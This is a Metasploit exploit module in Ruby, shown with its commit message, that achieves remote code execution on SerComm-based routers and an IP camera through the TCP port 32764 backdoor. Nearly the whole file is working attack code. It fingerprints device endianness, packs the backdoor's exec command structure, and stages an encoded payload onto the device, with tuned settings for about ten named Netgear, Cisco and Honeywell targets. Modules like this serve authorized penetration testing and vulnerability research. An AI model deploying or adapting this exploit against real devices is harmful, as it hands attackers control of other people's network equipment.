Matt Andreko
b7b1ddf1e8
Added targets for 8 specific targets that I've tested: Cisco WAP4410N, Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834 Added functionality to the CmdStagerEcho mix-in to support encoding via octal instead of hex based on the :enc_type option. This is because many devices would not output hex encoded values properly. Added options on a per-target basis for the PackFormat (endian pack() values for communication), UploadPath (because /tmp wasn't always writable), and PayloadEncode (previously mentioned octal encoding option) Note for some reason, some devices communicate over one endianness, but then require a payload for the other endianess. I'm not sure what's causing this, but if those specific combinations are not used, the exploit fails. More research may be required for this.
190 lines
5.0 KiB
Ruby
190 lines
5.0 KiB
Ruby
##
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = GreatRanking
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Exploit::CmdStagerEcho
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "SerComm Device Remote Code Execution",
|
|
'Description' => %q{
|
|
This module will cause remote code execution on several SerComm devices.
|
|
These devices typically include routers from NetGear and Linksys.
|
|
This module was tested successfully against the NetGear DG834 series
|
|
ADSL modem router.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
|
|
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'Space' => 10000, # Could be more, but this should be good enough
|
|
'DisableNops' => true
|
|
},
|
|
'Platform' => 'linux',
|
|
'Privileged' => false,
|
|
'Targets' =>
|
|
[
|
|
['Generic Linux MIPS Big Endian',
|
|
{
|
|
'Arch' => ARCH_MIPSBE,
|
|
'PackFormat' => 'VVV'
|
|
}
|
|
],
|
|
['Generic Linux MIPS Little Endian',
|
|
{
|
|
'Arch' => ARCH_MIPSLE,
|
|
'PackFormat' => 'NNN'
|
|
}
|
|
],
|
|
['Cisco WAP4410N',
|
|
{
|
|
# Note this target is little endian by network comm, but
|
|
# big endian file format. No idea why, but it works
|
|
'Arch' => ARCH_MIPSBE,
|
|
'PackFormat' => 'NNN',
|
|
}
|
|
],
|
|
['Honeywell WAP-PL2 IP Camera',
|
|
{
|
|
'Arch' => ARCH_MIPSLE,
|
|
'PackFormat' => 'VVV'
|
|
}
|
|
],
|
|
['Netgear DG834',
|
|
{
|
|
'Arch' => ARCH_MIPSBE,
|
|
'PackFormat' => 'VVV',
|
|
'NoArgs' => true,
|
|
}
|
|
],
|
|
['Netgear DG834G',
|
|
{
|
|
# Note this target is big endian by network comm, but
|
|
# little endian file format. No idea why, but it works
|
|
'Arch' => ARCH_MIPSLE,
|
|
'PackFormat' => 'VVV',
|
|
'PayloadEncode' => 'octal'
|
|
}
|
|
],
|
|
['Netgear DG834PN',
|
|
{
|
|
'Arch' => ARCH_MIPSBE,
|
|
'PackFormat' => 'VVV',
|
|
'NoArgs' => true
|
|
}
|
|
],
|
|
['Netgear DGN1000',
|
|
{
|
|
'Arch' => ARCH_MIPSBE,
|
|
'PackFormat' => 'VVV',
|
|
'NoArgs' => true
|
|
}
|
|
],
|
|
['Netgear DSG835',
|
|
{
|
|
'Arch' => ARCH_MIPSBE,
|
|
'PackFormat' => 'VVV',
|
|
'NoArgs' => true,
|
|
}
|
|
],
|
|
['Netgear WPNT834',
|
|
{
|
|
# Note this target is little endian by network comm, but
|
|
# big endian file format. No idea why, but it works
|
|
'Arch' => ARCH_MIPSBE,
|
|
'PackFormat' => 'NNN',
|
|
'UploadPath' => '/var',
|
|
'PayloadEncode' => 'octal'
|
|
}
|
|
],
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'References' =>
|
|
[
|
|
[ 'OSVDB', '101653' ],
|
|
[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
|
|
],
|
|
'DisclosureDate' => "Dec 31 2013" ))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(32764)
|
|
], self.class)
|
|
end
|
|
|
|
def check
|
|
fprint = endian_fingerprint
|
|
|
|
case fprint
|
|
when 'BE'
|
|
print_status("Detected Big Endian")
|
|
return Msf::Exploit::CheckCode::Vulnerable
|
|
when 'LE'
|
|
print_status("Detected Little Endian")
|
|
return Msf::Exploit::CheckCode::Vulnerable
|
|
end
|
|
|
|
return Msf::Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
def exploit
|
|
execute_cmdstager(
|
|
:noargs => target['NoArgs'],
|
|
:temp => target['UploadPath'],
|
|
:enc_format => target['PayloadEncode']
|
|
)
|
|
end
|
|
|
|
def endian_fingerprint
|
|
begin
|
|
connect
|
|
|
|
sock.put(rand_text(5))
|
|
res = sock.get_once
|
|
|
|
disconnect
|
|
|
|
if res && res.start_with?("MMcS")
|
|
return 'BE'
|
|
elsif res && res.start_with?("ScMM")
|
|
return 'LE'
|
|
end
|
|
rescue Rex::ConnectionError => e
|
|
print_error("Connection failed: #{e.class}: #{e}")
|
|
end
|
|
|
|
return nil
|
|
end
|
|
|
|
def execute_command(cmd, opts)
|
|
vprint_debug(cmd)
|
|
|
|
# Get the length of the command, for the backdoor's command injection
|
|
cmd_length = cmd.length
|
|
|
|
# 0x53634d4d => Backdoor code
|
|
# 0x07 => Exec command
|
|
# cmd_length => Length of command to execute, sent after communication struct
|
|
data = [0x53634d4d, 0x07, cmd_length].pack(target['PackFormat'])
|
|
|
|
connect
|
|
# Send command structure followed by command text
|
|
sock.put(data+cmd)
|
|
disconnect
|
|
|
|
Rex.sleep(1)
|
|
end
|
|
|
|
end
|